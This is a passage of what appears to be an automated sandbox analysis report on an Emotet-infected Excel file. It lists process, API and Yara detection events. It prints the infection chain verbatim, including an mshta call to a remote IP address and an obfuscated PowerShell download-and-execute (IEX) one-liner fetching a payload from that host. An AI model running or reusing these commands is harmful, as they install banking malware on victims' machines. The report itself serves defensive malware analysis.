                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 1312Thread sleep time: -300000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D4087 mov eax, dword ptr fs:[00000030h]9_2_002D4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214087 mov eax, dword ptr fs:[00000030h]10_2_00214087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274087 mov eax, dword ptr fs:[00000030h]11_2_00274087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364087 mov eax, dword ptr fs:[00000030h]12_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00254087 mov eax, dword ptr fs:[00000030h]14_2_00254087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00194087 mov eax, dword ptr fs:[00000030h]15_2_00194087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupArJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGheJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVhJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: imedpub_2.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f10000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.410000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.370000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.aa0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f10000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2580000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25f0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25f0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.310000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2f50000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.420000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.790000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2670000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.320000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9d0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b40000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fd0000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.330000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2670000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2620000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25f0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2f50000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.320000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f60000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.a80000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c40000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2480000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.ad0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.790000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.220000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f90000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2480000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.310000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2580000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ab0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fc0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.a80000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.220000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b40000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.420000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.aa0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
